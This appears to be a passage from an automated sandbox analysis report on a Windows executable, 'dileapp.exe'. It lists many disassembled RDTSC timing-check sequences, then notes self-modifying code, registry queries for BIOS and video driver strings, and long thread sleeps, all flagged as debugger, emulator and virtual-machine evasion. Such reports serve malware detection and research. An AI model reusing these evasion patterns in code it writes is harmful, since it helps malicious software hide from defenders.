                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123FC4F second address: 123FC71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FCCB120DFE7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F54D second address: 123F5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCCB0D02D18h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FCCB0D02D18h 0x00000019 popad 0x0000001a push edi 0x0000001b jmp 00007FCCB0D02D14h 0x00000020 pushad 0x00000021 popad 0x00000022 pop edi 0x00000023 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123F5AF second address: 123F5BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FCCB120DFDCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12429E2 second address: 1242A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FCCB120DFE0h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FCCB120DFE5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12498F1 second address: 1249901 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FCCB120DFD6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1249909 second address: 124993C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jne 00007FCCB0D02D06h 0x00000011 jmp 00007FCCB0D02D16h 0x00000016 popad 0x00000017 push edx 0x00000018 jg 00007FCCB0D02D06h 0x0000001e pop edx 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124807D second address: 124809A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jc 00007FCCB120DFD6h 0x0000000c jmp 00007FCCB120DFDFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124835C second address: 124837C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FCCB120DFE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 124851D second address: 1248527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FCCB0D02D06h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248527 second address: 1248543 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFE0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248547 second address: 1248557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5B4F second address: 11E5BC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FCCB120DFDAh 0x0000000c pop ecx 0x0000000d popad 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+13763215h] 0x00000015 mov dword ptr [ebp+13761C71h], edi 0x0000001b mov ebx, dword ptr [ebp+1391FB4Ch] 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FCCB120DFD8h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b mov di, C6D2h 0x0000003f add eax, ebx 0x00000041 mov edx, dword ptr [ebp+13762A90h] 0x00000047 nop 0x00000048 pushad 0x00000049 pushad 0x0000004a jmp 00007FCCB120DFE4h 0x0000004f pushad 0x00000050 popad 0x00000051 popad 0x00000052 push eax 0x00000053 push edx 0x00000054 push edi 0x00000055 pop edi 0x00000056 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11E5BDC second address: 11E5BE6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCCB0D02D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1248B76 second address: 1248B91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D15h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251EF7 second address: 1251F06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FCCB120DFD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F06 second address: 1251F21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D10h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F21 second address: 1251F2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDAh 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1251F2F second address: 1251F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007FCCB0D02D06h 0x0000000f jmp 00007FCCB0D02D12h 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125057E second address: 125059C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D18h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125059C second address: 12505B9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCCB120DFE3h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FC3 second address: 1254FDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D0Fh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1254FE6 second address: 1255007 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FCCB120DFD6h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125500B second address: 125501B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jbe 00007FCCB120DFD6h 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255030 second address: 1255061 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FCCB0D02D1Dh 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12555FD second address: 1255625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FCCB0D02D06h 0x0000000a popad 0x0000000b jmp 00007FCCB0D02D15h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FCCB0D02D06h 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1255907 second address: 125591F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D14h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 125A98D second address: 125A99B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12623E1 second address: 12623FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB120DFD8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FCCB120DFDFh 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1262E12 second address: 1262E1C instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12630C9 second address: 12630EF instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c jmp 00007FCCB0D02D16h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263224 second address: 126323D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FCCB0D02D06h 0x0000000d push esi 0x0000000e pop esi 0x0000000f js 00007FCCB0D02D06h 0x00000015 popad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 126323D second address: 1263279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 jo 00007FCCB120DFDAh 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 js 00007FCCB120DFDEh 0x00000017 ja 00007FCCB120DFD6h 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 jl 00007FCCB120DFD6h 0x00000026 jng 00007FCCB120DFD6h 0x0000002c jmp 00007FCCB120DFDBh 0x00000031 popad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263279 second address: 1263283 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FCCB0D02D06h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1263A62 second address: 1263A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D13h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCCB0D02D0Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1279FEB second address: 127A000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFDFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 127C9F1 second address: 127CA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB0D02D12h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007FCCB0D02D06h 0x00000014 push eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128631D second address: 128632C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C6C4 second address: 128C6D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCCB0D02D0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C4CC second address: 128C4EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FCCB0D02D06h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C4EB second address: 128C519 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FCCB120DFF1h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007FCCB120DFE9h 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C519 second address: 128C523 instructions: 0x00000000 rdtsc 0x00000002 js 00007FCCB0D02D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1294806 second address: 129481B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCCB120DFE0h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 129340E second address: 129341F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB120DFD6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1293863 second address: 129386D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FCCB0D02D06h 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12A0485 second address: 12A049B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FCCB0D02D0Fh 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12BCEA4 second address: 12BCEBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCCB0D02D0Dh 0x00000009 jp 00007FCCB0D02D06h 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12BCEBF second address: 12BCEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FCCB0D02D18h 0x00000010 push esi 0x00000011 jmp 00007FCCB0D02D0Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D4340 second address: 12D4371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCCB0D02D06h 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 pushad 0x00000011 jmp 00007FCCB0D02D0Fh 0x00000016 jne 00007FCCB0D02D0Ch 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D473B second address: 12D4757 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB120DFDAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FCCB120DFDCh 0x00000010 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D4763 second address: 12D476D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCCB0D02D0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D4C2C second address: 12D4C47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D11h 0x00000007 je 00007FCCB0D02D12h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D8F56 second address: 12D8F71 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCCB120DFDCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007FCCB120DFE8h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D91FF second address: 12D9272 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCCB120DFDCh 0x00000008 jc 00007FCCB120DFD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 call 00007FCCB120DFDAh 0x00000018 mov dword ptr [ebp+1376B668h], ebx 0x0000001e pop edx 0x0000001f push 00000004h 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007FCCB120DFD8h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Bh 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b mov edx, 4894D800h 0x00000040 mov edx, 45814DE9h 0x00000045 call 00007FCCB120DFD9h 0x0000004a jl 00007FCCB120DFE0h 0x00000050 jmp 00007FCCB120DFDAh 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D9276 second address: 12D9280 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FCCB120DFD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12D9280 second address: 12D92CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCCB0D02D15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edi 0x0000000e jmp 00007FCCB0D02D0Eh 0x00000013 pop edi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FCCB0D02D18h 0x0000001f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 4E7032C second address: 4E70332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 4E70332 second address: 4E70336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EE6A1 second address: 11EE710 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCCB0D02D0Ch 0x00000008 jnc 00007FCCB0D02D06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007FCCB0D02D08h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000019h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007FCCB0D02D08h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007FCCB0D02D0Eh 0x00000052 pushad 0x00000053 popad 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F083C second address: 11F084F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jno 00007FCCB120DFD6h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F0884 second address: 11F089A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007FCCB120DFD6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11EB4AA second address: 11EB4CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCCB0D02D18h 0x0000000f rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 11F8143 second address: 11F8175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCCB120DFE8h 0x00000008 jmp 00007FCCB120DFDEh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 123953A second address: 1239544 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCCB120DFE2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 1242D66 second address: 1242D74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FCCB120DFDCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 12623E1 second address: 12623FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCCB0D02D08h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCCB0D02D0Fh 0x00000012 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 128C4EB second address: 128C519 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FCCB0D02D21h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 56802E4 second address: 5680314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FCCB120DFE5h 0x0000000a xor ch, FFFFFFD6h 0x0000000d jmp 00007FCCB120DFE1h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 5680314 second address: 5680329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov dx, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\Public\Netstat\dileapp.exeRDTSC instruction interceptor: First address: 5680329 second address: 568032D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\Public\Netstat\dileapp.exeSpecial instruction interceptor: First address: 1028A0E instructions caused by: Self-modifying code
                Source: C:\Users\Public\Netstat\dileapp.exeSpecial instruction interceptor: First address: 1028AE0 instructions caused by: Self-modifying code
                Source: C:\Users\Public\Netstat\dileapp.exeSpecial instruction interceptor: First address: 11DD0BC instructions caused by: Self-modifying code
                Source: C:\Users\Public\Netstat\dileapp.exeSpecial instruction interceptor: First address: 127055A instructions caused by: Self-modifying code
                Source: C:\Users\Public\Netstat\dileapp.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 7804Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\Public\Netstat\dileapp.exe TID: 7804Thread sleep time: -30000s >= -30000sJump to behavior
